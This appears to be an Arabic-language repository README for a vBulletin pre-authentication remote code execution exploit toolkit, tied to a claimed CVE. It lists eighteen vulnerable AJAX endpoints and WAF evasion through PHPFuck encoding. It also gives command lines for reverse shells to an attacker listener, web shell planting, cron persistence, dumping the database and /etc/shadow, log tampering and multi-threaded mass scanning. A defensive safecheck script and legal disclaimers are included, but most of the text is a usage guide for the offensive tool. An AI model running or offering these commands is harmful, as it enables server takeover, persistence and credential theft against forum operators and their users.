
CVE-2026-61511 – ثغرة تنفيذ كود عن بُعد قبل المصادقة في vBulletin (CVSS 9.8). الثغرة في الإصدارات 5.x/6.x (غير مُصححة). استغلال متعدد عبر Endpoint Pool وAJAX وPHPFuck لتجاوز جدار الحماية. مجموعة أدوات كاملة: شل عكسي، بروكسي، استمرارية، ويب شل، عمليات قاعدة البيانات، التحكم في جدار الحماية، إدارة السجلات، فحص جماعي. نسختان: استغلال متعدد وفحص آمن. Python 3.8+ استخدمها بأخلاقية، والتزم بالقانون. 🔒

⚠️ للاستخدام الأخلاقي فقط – اختبار أمني مصرّح به
يوفر هذا المستودع أدوات للمتخصصين الأمنيين المعتمدين، وفرق الدفاع الأزرق، ومختبري الاختراق فقط.
الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني بموجب CFAA (الولايات المتحدة)، وقانون إساءة استخدام الحاسوب (المملكة المتحدة)، وTCK 243/244 (تركيا)، وقوانين مماثلة حول العالم.
CVE‑2026‑61511 هي ثغرة حقن eval() في PHP بمحرك عرض قوالب AJAX في vBulletin.
الإصدارات المتأثرة: 5.0.0 – 5.7.5 و6.0.0 – 6.2.1.
نقاط هجوم متعددة – توجد الثغرة في عدة معالجات AJAX:
/ajax/render/pagenav/ajax/api/ad/replaceAdTemplate/ajax/render/widget_php/ajax/render/widget_tabbedcontainer_tab_panel/ajax/api/content_* /getIndexableContentترميز PHPFuck – يتم تحويل الحمولة إلى سلسلة من عوامل تشغيل وأرقام PHP تتجاوز عوامل تصفية WAF وتسمح بتنفيذ كود PHP عشوائي.
لا يتطلب مصادقة – يمكن للمهاجم إرسال طلب POST مُصمم إلى أي نقطة نهاية ضعيفة وتنفيذ أوامر النظام بصلاحيات خادم الويب.
التأثير – اختراق كامل للخادم، وسرقة البيانات، والبوابات الخلفية، والحركة الجانبية، والاستمرارية. قم بترقية الإصدار!
| الأداة | الغرض | المستخدم المقصود |
|---|---|---|
exploit.py | مجموعة أدوات كاملة تشمل شل عكسي، واستمرارية، وعمليات ملفات، وتفريغ قاعدة بيانات، وإدارة جدار الحماية، وإدارة السجلات، وإعادة توجيه المنافذ، ونشر مفاتيح SSH، وفحص الشبكة، والفحص الجماعي (متعدد الخيوط). |
git clone https://github.com/tc4dy/CVE-2026-61511-PoC-Exploit
cd CVE-2026-61511-PoC-Exploit
pip install -r requirements.txt
محتوى requirements.txt:
request
urllib3
يتم توفير هذا البرنامج لأغراض تعليمية واختبار أمني معتمد فقط.
| فرق الأحمر / مختبري الاختراق المعتمدين |
safecheck.py | أداة تحقق غير تدخلية تفحص الثغرة دون تنفيذ أي حمولة ضارة. تكتشف الإصدار، وتختبر جميع نقاط النهاية، وتُنشئ تقريرًا مفصلاً. | فرق الأزرق / مدققي الأمان |
| الميزة | exploit.py | safecheck.py |
|---|
| اكتشاف الثغرة | ✅ | ✅ |
| اكتشاف الإصدار | ✅ | ✅ |
| اختبار متعدد نقاط النهاية (18 مسارًا) | ✅ | ✅ |
| تنفيذ الأوامر | ✅ | ❌ |
| شل عكسي | ✅ | ❌ |
| رفع/تنزيل الملفات | ✅ | ❌ |
| آليات الاستمرارية | ✅ | ❌ |
| نشر شل الويب | ✅ | ❌ |
| عمليات قاعدة البيانات | ✅ | ❌ |
| جمع معلومات النظام | ✅ | ✅ |
| إدارة جدار الحماية | ✅ | ❌ |
| إدارة السجلات | ✅ | ❌ |
| إعادة توجيه المنافذ | ✅ | ❌ |
| نشر مفاتيح SSH | ✅ | ❌ |
| فحص الشبكة | ✅ | ❌ |
| الفحص الجماعي (متعدد الخيوط) | ✅ | ❌ |
| دعم البروكسي | ✅ | ✅ |
| إخراج تقرير JSON | ✅ | ✅ |
| قائمة تفاعلية | ✅ | ❌ |
| وضع غير تدخلي (آمن) | ❌ | ✅ |
| وضع مفصّل/تصحيح | ✅ | ✅ |
| تنفيذ أوامر مخصصة | ✅ | ❌ |
| تسلسل أوامر متعددة | ✅ | ❌ |
| قراءة ملفات عن بُعد | ✅ | ❌ |
| كتابة ملفات عن بُعد | ✅ | ❌ |
| إدارة مستخدمي النظام | ✅ | ❌ |
| تقنيات تجاوز جدار الحماية | ✅ | ❌ |
| مراوغة WAF (PHPFuck) | ✅ | ✅ |
| السيناريو | الأداة الموصى بها |
|---|
| فريق الأزرق – التحقق مما إذا كان تثبيت vBulletin لديك ضعيفًا | safecheck.py |
| تدقيق أمني – تقييم ثغرات غير تدخلي | safecheck.py |
| فريق الأحمر – اختبار اختراق معتمد مع استغلال كامل | exploit.py |
| مكافآت الثغرات – اختبار الكشف المسؤول | safecheck.py |
| الفحص الجماعي – فحص أهداف متعددة بحثًا عن الثغرة | exploit.py (الاكتشاف فقط) |
| الاستجابة للحوادث – التحقق مما إذا كانت الأنظمة مخترقة | safecheck.py |
| المعامل | الوصف |
|---|
-t, --target | عنوان الهدف (مثال: http://forum.com/vb) |
--proxy | بروكسي HTTP (مثال: http://127.0.0.1:8080) |
--timeout | مهلة الطلب بالثواني (الافتراضي: 10) |
--retry | عدد مرات إعادة المحاولة لكل مسار (الافتراضي: 3) |
--output | حفظ تقرير مفصّل في ملف JSON |
-v, --verbose | إخراج مفصّل |
-q, --quiet | وضع هادئ (إخراج محدود) |
--lhost | مطلوب للاستغلال – عنوان IP لاستقبال الاتصال |
--lport | منفذ استقبال الاتصال (الافتراضي: 4444) |
--threads | عدد الخيوط للفحص الجماعي (الافتراضي: 5) |
--exploit | تنفيذ الاستغلال بعد الاكتشاف |
--full | هجوم كامل (جميع الوحدات) |
--shell | بدء شل عكسي |
--webshell | تثبيت شل ويب (/shell.php) |
--persist | تثبيت الاستمرارية (مهمة cron) |
--dump | تفريغ قاعدة البيانات |
--dump-creds | تفريغ بيانات الاعتماد (/etc/passwd, /etc/shadow) |
--interactive | قائمة تفاعلية بعد التحقق الناجح |
| # | السيناريو | الأمر |
|---|
| 1 | فحص سريع للثغرة | python safecheck.py -t http://target.com/vb |
| 2 | فحص مفصّل مع تقرير | python safecheck.py -t http://target.com/vb --output report.json -v |
| 3 | شل عكسي | python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --lport 4444 --shell |
| 4 | هجوم كامل (جميع الوحدات) | python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --full |
| 5 | فحص جماعي من ملف | python exploit.py -l targets.txt --lhost 192.168.1.100 --threads 20 --output results.json |
| 6 | وضع القائمة التفاعلية | python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --interactive |
| # | نقطة النهاية |
|---|
| 1 | /ajax/render/pagenav |
| 2 | /ajax/render/pagenav?template=page |
| 3 | /ajax/api/ad/replaceAdTemplate |
| 4 | /ajax/render/widget_php |
| 5 | /ajax/render/widget_tabbedcontainer_tab_panel |
| 6 | /ajax/api/content_infraction/getIndexableContent |
| 7 | /ajax/api/content_video/getIndexableContent |
| 8 | /ajax/api/content_text/getIndexableContent |
| 9 | /ajax/api/content_report/getIndexableContent |
| 10 | /ajax/api/content_redirect/getIndexableContent |
| 11 | /ajax/api/content_privatemessage/getIndexableContent |
| 12 | /ajax/api/content_poll/getIndexableContent |
| 13 | /ajax/api/content_photo/getIndexableContent |
| 14 | /ajax/api/content_link/getIndexableContent |
| 15 | /ajax/api/content_gallery/getIndexableContent |
| 16 | /ajax/api/content_event/getIndexableContent |
| 17 | /ajax/api/content_channel/getIndexableContent |
| 18 | /ajax/api/content_attach/getIndexableContent |